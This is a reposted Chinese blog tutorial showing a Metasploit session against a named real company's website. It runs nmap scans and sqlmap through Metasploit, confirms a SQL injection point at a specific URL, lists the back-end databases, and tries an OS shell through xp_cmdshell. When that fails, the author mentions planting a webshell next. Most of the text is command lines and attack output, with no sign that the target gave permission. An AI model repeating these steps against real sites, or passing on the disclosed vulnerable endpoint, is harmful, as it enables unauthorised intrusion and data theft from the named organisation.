All in one: pentest under metasploit
源:http://hi.baidu.com/p3rlish/blog/item/f54f4c097a907f8ad1581b0b.html
作为一个知名的渗透测试框架,metasploit集成了几乎所有的入侵渗透工具,其强大的功能让人叹为观止。慢慢的发掘,你会喜欢上他的
今天我要给大家演示的就是如何在metasploit做入侵渗透测试,从基本的信息收集,到入侵,到内部渗透,所有的这一切都在metasploit中完成。首先我们更新metasploit到最新版本
root@ubuntu:/pentest/exploits/framework3# svn update
A modules/exploits/windows/browser/ibmegath_getxmlvalue.rb
版本6609。 已经是最新版本,启动framewokr3
root@ubuntu:/pentest/exploits/framework3# ./msfconsole
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 153 aux
msf >
确定目标之后,首先我们要收集信息,比如DNS查询,服务器类型查询,端口开放信息查询,我们进行如下操作,至于为何这样,后面再做解释
msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_driver
[*] Active Driver: sqlite3
[*] Available: sqlite3, mysql
msf > load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new ‘db_driver’
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
msf > db_connect pentest
[*] Successfully connected to the database
[*] File: pentest
msf >
接下来,我们查询目标主机iP
msf > nslookup www.prolific.com.tw
[*] exec: nslookup www.prolific.com.tw
Server: 202.100.192.68
Address: 202.100.192.68#53
Non-authoritative answer:
www.prolific.com.tw canonical name = dns1.prolific.com.tw.
Name: dns1.prolific.com.tw
Address: 59.124.181.149
剩下的就是收集开放端口和服务信息,因为在metasploit里面有多种信息收集方式,出于个人习惯,我使用nmap,同时检测是否存在sqlinject漏洞,我们执行
msf > db_nmap -sV -P0 -O www.prolific.com.tw –script=SQLInject.nse
[*] exec: “/usr/bin/nmap” “-sV” “-P0″ “-O” “www.prolific.com.tw” “–script=SQLInject.nse” “-oX” “/tmp/dbnmap20090602-28001-njyqqa-0″
NMAP:
NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2009-06-02 03:14 CST
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/skype_v2-version.nse’ threw a run time error and could not be loaded.
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/iax2Detect.nse’ threw a run time error and could not be loaded.
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/PPTPversion.nse’ threw a run time error and could not be loaded.
NMAP: Interesting ports on 59.124.181.149:
NMAP: Not shown: 996 filtered ports
NMAP: PORT STATE SERVICE VERSION
NMAP: 21/tcp open ftp Serv-U ftpd 6.4
NMAP: 53/tcp open domain Microsoft DNS
NMAP: 80/tcp open http Microsoft IIS webserver 6.0
NMAP: 443/tcp closed https
NMAP: Device type: general purpose
NMAP: Running (JUST GUESSING) : Microsoft Windows 2003|2000|XP (98%)
NMAP: Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (98%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows 2000 SP4 (93%), Microsoft Windows XP Home SP2 (Russian) (93%), Microsoft Windows XP SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows 2000 Server SP4 (90%), Microsoft Windows Server 2003 SP0 or Windows XP SP2 (90%), Microsoft Windows Server 2003 Enterprise Edition SP2 (88%), Microsoft Windows XP Professional SP2 (French) (88%)
NMAP: No exact OS matches for host (test conditions non-ideal).
NMAP: Service Info: OS: Windows
NMAP:
NMAP: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
NMAP: Nmap done: 1 IP address (1 host up) scanned in 94.14 seconds
未检测出sql注射漏洞,通过扫描我们发现目标主机开放了ftp服务,DNS服务,IIS服务,判断出操作系统是windows server 2003.因为DNS出现了远程堆栈溢出,我们首先尝试对目标机器进行溢出,执行如下操作。
msf > db_hosts
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Host: 59.124.181.149 Status: alive OS:
msf > db_services
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=21 proto=tcp state=up name=ftp
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=53 proto=tcp state=up name=domain
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=80 proto=tcp state=up name=http
msf>
看来溢出无望了,接下来我们检测一下sql注射,这种站应该存在sql注射漏洞,OK,我们使用sqlmap模块
msf>use auxiliary/scanner/http/wmap_sqlmap
msf auxiliary(wmap_sqlmap) >
ok,看参数信息
msf auxiliary(wmap_sqlmap) > info
Name: SQLMAP SQL Injection External Module
Version: 5849
Provided by:
bernardo.damele <bernardo.damele@gmail.com>
daniele.bellucci <daniele.bellucci@gmail.com>
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
BATCH true yes Never ask for user input, use the default behaviour
BODY no The data string to be sent through POST
METHOD GET yes HTTP Method
OPTS no The sqlmap options to use
PATH index.php yes The path/file to test for SQL injection
Proxies no Use a proxy chain
QUERY id=1 no HTTP GET query
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
SQLMAP_PATH /sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
SSL false no Use SSL
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
Description:
This module launch a sqlmap session. sqlmap is an automatic SQL
injection tool developed in Python. Its goal is to detect and take
advantage of SQL injection vulnerabilities on web applications. Once
it detects one or more SQL injections on the target host, the user
can choose among a variety of options to perform an extensive
back-end database management system fingerprint, retrieve DBMS
session user and database, enumerate users, password hashes,
privileges, databases, dump entire or user specific DBMS
tables/columns, run his own SQL SELECT statement, read specific
files on the file system and much more.
恩,具体的参数我就不解释了,接下来,设定参数
msf auxiliary(wmap_sqlmap) > set RHOSTS www.prolific.com.tw
RHOSTS => www.prolific.com.tw
msf auxiliary(wmap_sqlmap) > set OPTS ‘ -g “site:www.prolific.com.tw ext:asp” –dbs’
OPTS => -g “site:www.prolific.com.tw ext:asp” –dbs
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py
SQLMAP_PATH => /var/pentest/database/sqlmap/sqlmap.py
接下来,看我们的配置信息
msf auxiliary(wmap_sqlmap) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
BATCH true yes Never ask for user input, use the default behaviour
BODY no The data string to be sent through POST
METHOD GET yes HTTP Method
OPTS -g “site:www.prolific.com.tw ext:asp” –dbs no The sqlmap options to use
PATH index.php yes The path/file to test for SQL injection
Proxies no Use a proxy chain
QUERY id=1 no HTTP GET query
RHOSTS www.prolific.com.tw yes The target address range or CIDR identifier
RPORT 80 yes The target port
SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
SSL false no Use SSL
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
ok,没问题,开始工作
msf auxiliary(wmap_sqlmap) > run
[*] exec: /var/pentest/database/sqlmap/sqlmap.py -u ‘http://59.124.181.149:80/index.php?id=1′ –method GET -g “site:www.prolific.com.tw ext:asp” –dbs –batch
SQLMAP:
SQLMAP: sqlmap/0.7rc2
SQLMAP: by Bernardo Damele A. G. <bernardo.damele@gmail.com>
SQLMAP:
SQLMAP: [*] starting at: 17:15:14
SQLMAP:
SQLMAP: [17:15:14] [INFO] first request to Google to get the session cookie
SQLMAP: [17:15:15] [INFO] sqlmap got 100 results for your Google dork expression, 69 of them are testable targets
SQLMAP: [17:15:15] [INFO] sqlmap got a total of 70 targets
SQLMAP: [17:15:15] [INFO] url 1:
SQLMAP: GET http://www.prolific.com.tw/eng/downloads.asp?ID=30
SQLMAP: do you want to test this url? [Y/n/q]
SQLMAP: > Y
SQLMAP: [17:15:15] [INFO] testing url http://www.prolific.com.tw/eng/downloads.asp?ID=30
SQLMAP: [17:15:15] [INFO] testing connection to the target url
SQLMAP: [17:15:16] [INFO] testing if the url is stable, wait a few seconds
SQLMAP: [17:15:18] [INFO] url is stable
SQLMAP: [17:15:18] [INFO] testing if User-Agent parameter ‘User-Agent’ is dynamic
SQLMAP: [17:15:20] [WARNING] User-Agent parameter ‘User-Agent’ is not dynamic
SQLMAP: [17:15:20] [INFO] testing if Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is dynamic
SQLMAP: [17:15:22] [WARNING] Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is not dynamic
SQLMAP: [17:15:22] [INFO] testing if GET parameter ‘ID’ is dynamic
SQLMAP: [17:15:23] [INFO] confirming that GET parameter ‘ID’ is dynamic
SQLMAP: [17:15:25] [INFO] GET parameter ‘ID’ is dynamic
SQLMAP: [17:15:25] [INFO] testing sql injection on GET parameter ‘ID’ with 0 parenthesis
SQLMAP: [17:15:25] [INFO] testing unescaped numeric injection on GET parameter ‘ID’
SQLMAP: [17:15:25] [INFO] GET parameter ‘ID’ is not unescaped numeric injectable
SQLMAP: [17:15:25] [INFO] testing single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:15:27] [INFO] confirming single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:15:28] [INFO] GET parameter ‘ID’ is single quoted string injectable with 0 parenthesis
SQLMAP: [17:15:28] [INFO] do you want to exploit this SQL injection? [Y/n] Y
SQLMAP: [17:15:28] [INFO] testing for parenthesis on injectable parameter
SQLMAP: [17:15:30] [INFO] the injectable parameter requires 0 parenthesis
SQLMAP: [17:15:30] [INFO] testing MySQL
SQLMAP: [17:15:31] [WARNING] the back-end DMBS is not MySQL
SQLMAP: [17:15:31] [INFO] testing Oracle
SQLMAP: [17:15:31] [WARNING] the back-end DMBS is not Oracle
SQLMAP: [17:15:31] [INFO] testing PostgreSQL
SQLMAP: [17:15:32] [WARNING] the back-end DMBS is not PostgreSQL
SQLMAP: [17:15:32] [INFO] testing Microsoft SQL Server
SQLMAP: [17:15:33] [INFO] confirming Microsoft SQL Server
SQLMAP: [17:15:34] [INFO] the back-end DBMS is Microsoft SQL Server
SQLMAP: web server operating system: Windows 2000
SQLMAP: web application technology: ASP.NET, Microsoft IIS 6.0, ASP
SQLMAP: back-end DBMS: Microsoft SQL Server 2000
SQLMAP:
SQLMAP: [17:15:34] [INFO] fetching database names
SQLMAP: [17:15:34] [INFO] fetching number of databases
SQLMAP: [17:15:34] [INFO] retrieved: 7
SQLMAP: [17:15:42] [INFO] retrieved: master
SQLMAP: [17:16:43] [INFO] retrieved: model
SQLMAP: [*] msdb
SQLMAP: [*] Northwind
SQLMAP: [*] Prolific
SQLMAP: [*] pubs
SQLMAP: [*] tempdb
SQLMAP:
ok,到这里已经达到我们所想要的目的了,中止继续运行的进程……
[*] Auxiliary module execution completed
msf auxiliary(wmap_sqlmap) >
接下来,我们要用metasploit来测试此注射点了,修改一下参数
msf auxiliary(wmap_sqlmap) > set RHOSTS www.prolific.com.tw
RHOSTS => www.prolific.com.tw
msf auxiliary(wmap_sqlmap) > set PATH /eng/downloads.asp
PATH => /eng/downloads.asp
msf auxiliary(wmap_sqlmap) > set QUERY ID=30
QUERY => ID=30
msf auxiliary(wmap_sqlmap) > set OPTS ‘–os-pwn –msf-path=/var/pentest/framework3
OPTS => –os-pwn –msf-path=/var/pentest/framework3
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py
SQLMAP_PATH => /var/pentest/database/sqlmap/sqlmap.py
msf auxiliary(wmap_sqlmap) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
BATCH true yes Never ask for user input, use the default behaviour
BODY no The data string to be sent through POST
METHOD GET yes HTTP Method
OPTS –os-pwn –msf-path=/var/pentest/framework3 no The sqlmap options to use
PATH /eng/downloads.asp yes The path/file to test for SQL injection
Proxies no Use a proxy chain
QUERY ID=30 no HTTP GET query
RHOSTS www.prolific.com.tw yes The target address range or CIDR identifier
RPORT 80 yes The target port
SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
SSL false no Use SSL
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
ok,检查无误,我们开始执行
msf auxiliary(wmap_sqlmap) > run
[*] exec: /var/pentest/database/sqlmap/sqlmap.py -u ‘http://59.124.181.149:80//eng/downloads.asp?ID=30′ –method GET –os-pwn –msf-path=/var/pentest/framework3 –batch
SQLMAP:
SQLMAP: sqlmap/0.7rc2
SQLMAP: by Bernardo Damele A. G. <bernardo.damele@gmail.com>
SQLMAP:
SQLMAP: [*] starting at: 17:48:11
SQLMAP:
SQLMAP: [17:48:11] [INFO] testing connection to the target url
SQLMAP: [17:48:12] [INFO] testing if the url is stable, wait a few seconds
SQLMAP: [17:48:14] [INFO] url is stable
SQLMAP: [17:48:14] [INFO] testing if User-Agent parameter ‘User-Agent’ is dynamic
SQLMAP: [17:48:15] [WARNING] User-Agent parameter ‘User-Agent’ is not dynamic
SQLMAP: [17:48:15] [INFO] testing if Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is dynamic
SQLMAP: [17:48:15] [WARNING] Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is not dynamic
SQLMAP: [17:48:15] [INFO] testing if GET parameter ‘ID’ is dynamic
SQLMAP: [17:48:17] [INFO] confirming that GET parameter ‘ID’ is dynamic
SQLMAP: [17:48:19] [INFO] GET parameter ‘ID’ is dynamic
SQLMAP: [17:48:19] [INFO] testing sql injection on GET parameter ‘ID’ with 0 parenthesis
SQLMAP: [17:48:19] [INFO] testing unescaped numeric injection on GET parameter ‘ID’
SQLMAP: [17:48:19] [INFO] GET parameter ‘ID’ is not unescaped numeric injectable
SQLMAP: [17:48:19] [INFO] testing single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:48:22] [INFO] confirming single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:48:22] [INFO] GET parameter ‘ID’ is single quoted string injectable with 0 parenthesis
SQLMAP: [17:48:22] [INFO] testing for parenthesis on injectable parameter
SQLMAP: [17:48:25] [INFO] the injectable parameter requires 0 parenthesis
SQLMAP: [17:48:25] [INFO] testing MySQL
SQLMAP: [17:48:25] [WARNING] the back-end DMBS is not MySQL
SQLMAP: [17:48:25] [INFO] testing Oracle
SQLMAP: [17:48:26] [WARNING] the back-end DMBS is not Oracle
SQLMAP: [17:48:26] [INFO] testing PostgreSQL
SQLMAP: [17:48:27] [WARNING] the back-end DMBS is not PostgreSQL
SQLMAP: [17:48:27] [INFO] testing Microsoft SQL Server
SQLMAP: [17:48:28] [INFO] confirming Microsoft SQL Server
SQLMAP: [17:48:28] [INFO] the back-end DBMS is Microsoft SQL Server
SQLMAP: web server operating system: Windows 2000
SQLMAP: web application technology: ASP.NET, Microsoft IIS 6.0, ASP
SQLMAP: back-end DBMS: Microsoft SQL Server 2000
SQLMAP:
SQLMAP: [17:48:28] [INFO] testing stacked queries support on parameter ‘ID’
SQLMAP: [17:48:39] [INFO] the web application supports stacked queries on parameter ‘ID’
SQLMAP: [17:48:39] [INFO] testing if current user is DBA
SQLMAP: [17:48:39] [INFO] retrieved: 0
SQLMAP: [17:48:44] [WARNING] the functionality requested might not work because the session user is not a database administrator
SQLMAP: [17:48:44] [INFO] checking if xp_cmdshell extended procedure is available, wait..
SQLMAP: [17:48:44] [INFO] xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] Y
SQLMAP: [17:48:45] [WARNING] xp_cmdshell re-enabling failed
SQLMAP: [17:48:45] [INFO] creating xp_cmdshell with sp_OACreate
SQLMAP: [17:48:46] [WARNING] xp_cmdshell creation failed, probably because sp_OACreate is disabled
SQLMAP: [17:48:46] [ERROR] unable to proceed without xp_cmdshell
SQLMAP:
SQLMAP: [*] shutting down at: 17:48:46
SQLMAP:
[*] Auxiliary module execution completed
啊噢,执行失败了,看来此注射点不是sa权限的,无法调用xpcmdshell,剩下的就是要考虑写入webshell了
本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/346226,如需转载请自行联系原作者
All in one: pentest under metasploit相关推荐
- 学习笔记-Windows 安全
Windows 安全 注 : 笔记中拓扑图 drawio 源文件在其图片目录下 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 漏 ...
- MacOS下的渗透测试工具
信息收集工具 工具名称 安装命令 CeWL brew install sidaf/pentest/cewl dirb brew install sidaf/pentest/dirb dnsrecon ...
- Metasploit从文件中读取目标地址
本文简单介绍如何使用Metasploit从文件中读取目标地址,来执行检测. 以检测MS17-010漏洞为例,在设定RHOSTS参数时,可设定目标地址范围和CIDR地址块,设定单个IP的目标也是可以的. ...
- Metasploit渗透测试魔鬼训练营
信息搜集 外围情报搜集 物理机有网状态下 物理机无网状态下 个人推测 获取的信息 主机探测与端口扫描 活跃主机扫描 ICMP Ping命令 Metasploit的主机发现模块 arp_sweep使用方 ...
- Pentest BOX安装和使用
Pentest Box:渗透测试盒子,是一款Windows平台下预配置的便携式开源渗透测试环境,而它也是著名黑客Kapustkiy常用的工具之一.这里集成的大都是Linux下的工具,Kali Linu ...
- 如何使用Metasploit对安卓手机进行控制
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备.创建负载我们需要两台虚拟机:Kali Linux和安卓模拟器. 打开vm启动Kali ...
- Pentest WiKi Part1 信息收集
0x01 前言 前段时间github上看到pentest wiki这个项目,于是就想折腾一下和几个基友一起把这个wiki翻译一波,对于刚入门的安全人员还是比较友好的,因为篇幅原因,先发出第一部分: 信 ...
- Metasploit Framework Handbook
文章目录 前言 MsFramework Metasploit 诞生发展 体系结构 功能阶段 工具管理 基本命令 情报搜集 网络服务渗透测试 Refference 前言 众所周知Metasploit工具 ...
- Metasploit——辅助模块(Auxiliary)
作用:Metasploit的辅助模块主要用于信息搜集阶段,功能包括扫描.口令猜解.敏感信息嗅探.FUZZ测试发掘漏洞.实施网络协议欺骗等 . 一.辅助模块分为三个大类 1.Admin:Admin/HT ...
最新文章
- 学习Java编程培训的书籍有哪些
- Asp.Net 分段,断点,下载
- .Net Core3.1下使用Swagger搭建web api项目
- MySQL里面的in关键字
- python列表赋值 连续整数_Python_03_字符串_数据类型_for循环_列表操作
- python国际象棋ai程序_使用Python创建属于你的国际象棋AI
- linux关闭网卡休眠_CentOS_Linux常用实用指令整理三:高级指令
- Centos之LAMP环境搭建
- java spring server_java server之spring中的IOC如何用java实现?
- 卷积神经网络的参数量和计算量
- Design System 中的 Design Token
- 关于antd table展开行expandable的坑和解决办法
- 重庆财经职业学院计算机一级考试题,2021年重庆财经职业学院单招语文考试模拟试题库...
- Pygame放大缩小照片
- Java设计模式-模板模式
- 什么软件可以支持图片转语音?
- 武汉大学计算机学院李明,第一届全国SLAM技术论坛在浙江大学成功举办
- Dashgo D1使用手册
- 练手练到阅文集团作家中心了,python crawlspider 二维抓取学习
- a^b%c(蒙格马利快速幂模算法)